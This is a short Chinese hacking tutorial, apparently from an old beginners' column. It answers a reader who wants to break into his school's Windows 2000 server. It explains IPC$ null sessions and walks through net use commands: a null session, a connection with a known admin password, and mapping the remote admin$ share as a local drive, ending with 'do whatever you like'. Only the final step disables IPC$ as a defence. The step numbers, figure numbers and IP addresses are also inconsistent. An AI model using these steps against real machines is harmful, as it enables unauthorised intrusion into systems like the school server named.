Net命令轻松实现IPC$连接

　　菜鸟提问：

　　我想入侵我学校的WINDOWS 2000主机，朋友告诉我，可以用IPC$来实现入侵，可到底什么是IPC$空连接，如何来建立IPC$连接呢？

　　理论点拨：

　　IPC$（进程间通信）共享是NT 主机上一个标准的隐藏共享，主要用于服务器到服务器的通信。NT主机用来互相连接并通过这个共享来获得各种必要的信息。鉴于在各种操作系统中都有很多设计特征，网络入侵者已经懂得利用这种特征来达到他们的目的。通过连接这个共享，网络入侵者从技术上就能够实现与您的服务器的有效连接。通过与这个共享的空连，网络入侵者就能够在不需要提供任何身份证明的情况下建立这一连接。

　　实战解决：

　　1、创建一个空连接，请使用命令：net use \\192.168.0.2，如图23所示，然后用命令查看网络连接：net use。

　　图23

　　当然也可以使用命令：net use \\192.168.0.2\ipc$ “” /user:”，与上面的命令作用相同，如

　　图24所示。

　　图24

　　3、创建一个IPC$连接。假设我们已经知道远程主机192.168.0.10的一个管理员用户admin和密码

　　123，我们就可以实施IPC入侵。运行如下命令：net use \\192.168.0.2\ipc$ 123 /user:admin，如图22所示。

　　图25

　　4、将其远程主机系统目录映射为本地Z：盘，使用命令：net use z: \\192.168.0.2\admin$，如图

　　26。这样我们就可以在“我的电脑”中像使用本地硬盘一样操作远程计算机了，如图27。想做些什么事，你自己看着办吧！呵呵~~~

　　图26

　　图27

　　5、当我们做完了要做的事，就要来断开IPC远程会话，使用命令：net use \\192.168.0.2\IPC$

　　/del，如图28示。

　　图28

　　6、禁用IPC$会话连接，请使用命令：net share ipc$ /delete，这样别人就不能通过IPC$来入侵了。